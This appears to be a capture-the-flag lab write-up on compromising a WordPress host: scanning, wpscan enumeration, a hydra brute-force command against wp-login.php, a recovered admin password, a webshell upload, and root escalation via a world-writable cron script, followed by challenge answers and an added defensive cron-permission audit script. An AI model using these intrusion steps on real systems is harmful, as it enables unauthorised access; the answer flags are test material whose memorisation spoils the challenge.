# Web Range-128

## Challenge 128

## Challenge 129

![image](https://hackmd.io/_uploads/rJkEX8tFgg.png)

* Rustscan
    * ![image](https://hackmd.io/_uploads/HkY1IN5Ygx.png)
* Nmap
    * ![image](https://hackmd.io/_uploads/B14SLEqFgg.png)
* WordPress website
    * ![image](https://hackmd.io/_uploads/rJtb849Fgl.png)
    * ![image](https://hackmd.io/_uploads/BkzfIVctlx.png)
* dirsearch
    * ![image](https://hackmd.io/_uploads/Bk68LEcFeg.png)
* WPScan
    * ![image](https://hackmd.io/_uploads/BJyyvV5Flg.png)

    ```zsh
    # -e takes a comma-separated list: vulnerable plugins, vulnerable themes, users
    wpscan --url http://10.10.1.62/ -e vp,vt,u
    ```
* Wpadmin
    * ![image](https://hackmd.io/_uploads/Bymfw45Kxg.png)
* Used hydra to get wpadmin's password
    * ![image](https://hackmd.io/_uploads/B1laDN9Kxe.png)
    * ![image](https://hackmd.io/_uploads/BkTFd49Yxe.png)
    * `admin:@6h$ER$*l3z`

    ```zsh
    hydra -l admin -P Passwords.txt 10.10.1.62 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:The password you entered for the username"
    ```
* Uploaded a plugin through the admin dashboard; phpinfo was successfully uploaded to `/wp-content/uploads/2025/08/info.php`
    * ![image](https://hackmd.io/_uploads/S1SlsV5Feg.png)
    * ![image](https://hackmd.io/_uploads/ryyziNcFgl.png)
* Uploaded a webshell and got a shell as `www-data`
    * ![image](https://hackmd.io/_uploads/rJyPjN5tee.png)
    * ![image](https://hackmd.io/_uploads/H1huiN5tex.png)
    * ![image](https://hackmd.io/_uploads/Hy8njN9txx.png)
* `data.sh` has permission 777
    * ![image](https://hackmd.io/_uploads/BJLH24qFgx.png)
* There is a scheduled job that runs as root
    * ![image](https://hackmd.io/_uploads/BkT_1Bqtgg.png)
* flag
    * ![image](https://hackmd.io/_uploads/Bkj6Frctex.png)

## Answer

* Challenge 128: `data.sh`
* Challenge 129: `GfsgEE4FV`
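
The weakness recorded above (a mode-777 `data.sh` on a host that also has a scheduled job running as root) is something a defender can audit for. The script below is an added example, not part of the original writeup: it assumes `/etc/crontab`-style entries with a user field, and the function names, the `TRUSTED_UID` variable and the sample crontab are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added audit sketch: which files run by root's scheduled jobs can a non-root user change?
# Assumes /etc/crontab-style lines: "m h dom mon dow user command" or "@reboot user command".
TRUSTED_UID=${TRUSTED_UID:-0}   # hypothetical knob: the only uid allowed to own these files

# Print each absolute path named in the command part of a root entry in file $1.
root_cron_paths() {
    awk '$1 ~ /^#/ || NF == 0 { next }
         { u = ($1 ~ /^@/) ? 2 : 6 }
         $u == "root" { for (i = u + 1; i <= NF; i++) if ($i ~ /^\//) print $i }' "$1" | sort -u
}

# Echo why regular file $1 is modifiable by someone other than TRUSTED_UID; echo nothing if safe.
perm_issue() {
    [ -f "$1" ] || return 0                      # skips devices such as /dev/null
    mode_uid=$(ls -ldnL -- "$1" | awk '{ print $1, $3 }')
    case "${mode_uid% *}" in                     # mode string, e.g. -rwxrwxrwx
        ????????w*) echo "world-writable"; return ;;
        ?????w*)    echo "group-writable"; return ;;
    esac
    [ "${mode_uid#* }" = "$TRUSTED_UID" ] || echo "owned by uid ${mode_uid#* }"
}

# Print "path: issue" for every risky file referenced by root entries in crontab file $1.
audit_root_cron() {
    root_cron_paths "$1" | while read -r p; do
        issue=$(perm_issue "$p")
        [ -z "$issue" ] || echo "$p: $issue"
    done
}

# Constructed sample (the page does not show the actual schedule entry):
# a root job pointing at a mode-777 data.sh, a 755 script, and a non-root job.
demo() {
    d=$(mktemp -d)
    printf '#!/bin/sh\n' > "$d/data.sh";   chmod 777 "$d/data.sh"
    printf '#!/bin/sh\n' > "$d/backup.sh"; chmod 755 "$d/backup.sh"
    printf '%s\n' "# constructed crontab" "SHELL=/bin/sh" \
        "* * * * * root $d/data.sh" "0 3 * * * root $d/backup.sh" \
        "*/5 * * * * www-data $d/data.sh" > "$d/crontab"
    # Demo files belong to the current user, so treat that uid as trusted here.
    TRUSTED_UID=$(id -u) audit_root_cron "$d/crontab"
    rm -rf "$d"
}
demo
```

On a real host, point `audit_root_cron` at `/etc/crontab` and each file under `/etc/cron.d/` with `TRUSTED_UID` left at 0; any path it reports should be owned by root with mode 755 or stricter.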